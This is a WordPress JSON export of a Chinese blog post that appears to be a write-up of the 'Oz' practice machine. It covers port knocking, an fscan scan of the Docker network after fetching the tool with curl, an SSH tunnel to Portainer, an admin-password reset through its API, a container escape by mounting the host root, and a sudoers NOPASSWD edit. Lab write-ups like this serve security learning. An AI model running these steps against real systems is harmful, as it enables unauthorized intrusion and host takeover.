{"id":82,"date":"2024-04-05T15:33:56","date_gmt":"2024-04-05T07:33:56","guid":{"rendered":"http:\/\/xiyu12.top\/?p=82"},"modified":"2024-04-05T15:33:56","modified_gmt":"2024-04-05T07:33:56","slug":"oz","status":"publish","type":"post","link":"http:\/\/www.xiyu12.top\/?p=82","title":{"rendered":"Oz"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\">hashcat \u7834\u89e3hash<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">john \u7834\u89e3hash<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u7aef\u53e3\u8f6c\u53d1<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">curl ssti\u6ce8\u5165 \u53cd\u5f39shell<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">docker \u73af\u5883\u6e17\u900f<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u5b57\u5178\u751f\u6210<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u4e00\u3001\u7aef\u53e3\u8f6c\u53d1<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u4f7f\u7528 knock 192.168.1.160 -u 40809 50212 46969 &amp;&amp; ssh -D 9000 dorthi@192.168.1.160 -i id_rsa \u767b\u9646<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fdb\u5165shell \u540e  \u4f7f\u7528  ip a \u67e5\u770b\u5f53\u524d\u7684IP\u5730\u5740 \u53d1\u73b0\u6709\u5f88\u591a\u7f51\u5361  \u53ef\u4ee5\u63a8\u65ad \u4f7f\u7528\u4e86 docker<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u4f7f\u7528   <a href=\"https:\/\/github.com\/shadow1ng\/fscan.git\">https:\/\/github.com\/shadow1ng\/fscan.git<\/a>   \u5185\u7f51\u7efc\u5408\u626b\u63cf\u5de5\u5177<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u7f16\u8bd1\u547d\u4ee4<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>go build -ldflags=\"-s -w \" -trimpath main.go\nupx -9 fscan.exe (\u53ef\u9009,\u538b\u7f29\u4f53\u79ef)\n\n\u626b\u63cf\u4e00\u4e0b <\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>python3 -m http.server 8000\ncurl http:\/\/192.168.1.130:8000\/fscan.elf -O \n.\/fscan.elf -h 172.17.0.1\/24\nstart infoscan\ntrying RunIcmp2\nThe current user permissions unable to send icmp packets\nstart ping\n(icmp) Target 172.17.0.2      is alive\n(icmp) Target 172.17.0.1      is alive\n&#91;*] Icmp alive hosts len is: 2\n172.17.0.1:8080 open\n172.17.0.2:9000 open\n172.17.0.1:80 open\n172.17.0.1:22 open\n&#91;*] alive ports len is: 4\nstart vulscan\n&#91;*] WebTitle http:\/\/172.17.0.1         code:200 len:75     title:OZ webapi\n&#91;*] WebTitle http:\/\/172.17.0.2:9000    code:200 len:1299   title:Portainer\n&#91;*] WebTitle http:\/\/172.17.0.1:8080    code:302 len:219    title:Redirecting... \u8df3\u8f6curl: http:\/\/172.17.0.1:8080\/login\n&#91;*] WebTitle http:\/\/172.17.0.1:8080\/login code:200 len:2115   title:GBR Support - Login\n\u5df2\u5b8c\u6210 5\/5\n&#91;*] \u626b\u63cf\u7ed3\u675f,\u8017\u65f6: 10.131552852s\n<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u53ef\u4ee5\u770b\u5230\u6709<a href=\"http:\/\/172.17.0.2:9000\">http:\/\/172.17.0.2:9000<\/a>  portainer \u670d\u52a1  \u8fd0\u884c\u5728 9000\u7aef\u53e3<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u670d\u52a1\u8fd0\u884c\u5728 172.17.0.2 \u8fd9\u53f0\u4e3b\u673a\u4e0a  \u65e0\u6cd5\u76f4\u63a5\u8bbf\u95ee \u53ef\u4ee5\u4f7f\u7528\u7aef\u53e3\u8f6c\u53d1\u7684\u65b9\u5f0f \u8bbf\u95ee<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>enter\n~C\n-L :5555:172.17.0.2:9000<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u7136\u540e\u5728\u6d4f\u89c8\u5668\u4f7f\u7528  http:\/\/127.0.0.1:5555  \u8bbf\u95ee\u670d\u52a1<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u9996\u5148\u9700\u8981   \u767b\u9646  <\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u4f46\u662f\u6709\u4e00\u4e2a\u66f4\u6539\u5bc6\u7801\u7684\u65b9\u6cd5<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code> http POST 172.17.0.2:9000\/api\/users\/admin\/init Username=\"admin\" Password=\"df\"<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u4e8c\u3001 docker \u9003\u9038\u5230\u5bbf\u4e3b\u673a \u63d0\u6743<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u5728\u542f\u52a8<code>docker<\/code>\u5bb9\u5668\u65f6\uff0c\u5c06\u670d\u52a1\u5668\u4e2d\u7684\u6839\u76ee\u5f55\u6216\u654f\u611f\u76ee\u5f55\u6302\u8f7d\u5230\u5bb9\u5668\u4e2d\u65f6\uff0c\u53ef\u80fd\u4f1a\u9020\u6210<code>docker<\/code>\u9003\u9038\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u7279\u6743\u6a21\u5f0f\u9003\u9038\u662f\u4e00\u79cd\u6700\u7b80\u5355\u6709\u6548\u7684\u9003\u9038\u65b9\u6cd5\uff0c\u4f7f\u7528\u7279\u6743\u6a21\u5f0f\u542f\u52a8\u7684\u5bb9\u5668\u65f6\uff0c<code>docker<\/code>\u7ba1\u7406\u5458\u53ef\u901a\u8fc7<code>mount<\/code>\u547d\u4ee4\u5c06\u5916\u90e8\u5bbf\u4e3b\u673a\u78c1\u76d8\u8bbe\u5907\u6302\u8f7d\u8fdb\u5bb9\u5668\u5185\u90e8\uff0c\u83b7\u53d6\u5bf9\u6574\u4e2a\u5bbf\u4e3b\u673a\u7684\u6587\u4ef6\u8bfb\u5199\u6743\u9650\uff0c\u53ef\u76f4\u63a5\u901a\u8fc7<code>chroot<\/code>\u5207\u6362\u6839\u76ee\u5f55\u3001\u5199<code>ssh<\/code>\u516c\u94a5\u548c<code>crontab<\/code>\u8ba1\u5212\u4efb\u4f55\u7b49\u9003\u9038\u5230\u5bbf\u4e3b\u673a<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Portainer\u662f\u4e00\u4e2a\u8f7b\u91cf\u7ea7\u7684docker\u73af\u5883\u7ba1\u7406UI\uff0c\u53ef\u4ee5\u7528\u6765\u7ba1\u7406<a href=\"https:\/\/www.kubernetes.org.cn\/tags\/docker\" target=\"_blank\" rel=\"noreferrer noopener\">docker<\/a>\u5bbf\u4e3b\u673a\u548cdocker swarm\u96c6\u7fa4\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/04\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-04-25-224623-1024x458.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/04\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-04-25-224623-1024x458.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-249\"\/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/04\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-04-25-224638-1024x369.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/04\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-04-25-224638-1024x369.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-252\"\/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/04\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-04-25-224653-1024x573.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/04\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-04-25-224653-1024x573.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-248\"\/><\/div><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>\u4f7f\u7528Portainer  \u65b0\u5efa\u4e00\u4e2a\u5bb9\u5668   \u7136\u540e\u9009\u62e9 \u4f7f\u7528 apline \u955c\u50cf  python:2.7-apline  \n\u9009\u4e2d\u201cInteractive &amp; TTY\u201d  \u7136\u540e\u5728 volumes \u4e2d \u8bbe\u7f6e   \/  \u548c\/rootfs\ncreate   \u7136\u540e   \u5728\u5bb9\u5668\u4e2d \u70b9\u51fb\u63a7\u5236\u53f0  \u4f7f\u7528\/bin\/sh   \u5f00\u542f\u8fde\u63a5\n\u83b7\u5f97\u4e86\u4e00\u4e2ashell   \u8bbf\u95ee\/rootfs   \u5728\/rootfs\/root \u4e2d\u627e\u5230root.txt\n<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>\u7136\u540e\u4f7f\u7528  \n\/rootfs\/etc # chmod 600 sudoers\n\/rootfs\/etc # echo \"dorthi ALL=(ALL) NOPASSWD: ALL\" >> sudoers<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>hashcat \u7834\u89e3hash john \u7834\u89e3hash \u7aef\u53e3\u8f6c\u53d1 curl ssti\u6ce8\u5165 \u53cd\u5f39shell doc [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[9],"tags":[27,38,85,114],"class_list":["post-82","post","type-post","status-publish","format-standard","hentry","category-target-aircraft","tag-docker","tag-httpie","tag-ssh","tag-114"],"_links":{"self":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts\/82","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=82"}],"version-history":[{"count":0,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts\/82\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=82"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=82"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=82"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}